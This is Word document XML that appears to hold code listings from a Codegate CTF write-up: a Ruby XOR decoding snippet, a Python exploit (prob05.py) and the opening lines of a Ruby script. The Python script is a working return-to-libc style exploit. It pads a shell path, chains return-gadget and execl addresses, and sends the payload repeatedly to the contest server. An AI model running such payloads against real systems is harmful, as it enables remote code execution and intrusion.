    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t># decode (XOR)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>i = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>dst = src.map{|s|</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  d = s ^ key[i]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">  i += 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">  d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t># print decode data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>pp dst.map{|c| c.chr}.join</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="001A317E" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>-prob05.py--</w:t>
      </w:r>
      <w:r w:rsidR="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>#!/usr/bin/env python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>from struct import *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>from socket import *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>type = "harder";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>host = "ctf4.codegate.org";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>if type == "harder":</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port = 9001;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>elif type == "easy":</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port = 9000;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>else:</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print "type ERROR!";</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exit();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>ebp = pack("I", 0xBFFFF004);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>execl = pack("I", 0x001A70C0);# execl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>ret_spam = pack("I", 0x08048619);# retn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>cmd = "/tmp/0071234/sh";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>cmd = cmd + "\x00" * (264 - len(cmd));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>payload = cmd + ebp + ret_spam * 6 + execl + "\n";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>for i in xrange(100):</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print "connect to %s:%d" % (host, port);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pP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s = socket(AF_INET, SOCK_STREAM);</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s.settimeout(10);</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s.connect((host, port));</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rmsg = s.recv(512);</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print rmsg;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pP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s.send(payload);</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s.close();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">        print open("/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>tmp/0071234/log", "rt").read();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00AF29A5" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00EB4B4B" w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="00C03E31" w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="00EB4B4B" w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>prob10.rb</w:t>
      </w:r>
      <w:r w:rsidR="00921462" w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="00C03E31" w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>#!/usr/bin/ruby</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>require 'pp'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>require 'digest/md5'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>require 'cgi'</w:t>
      </w:r>
    </w:p>
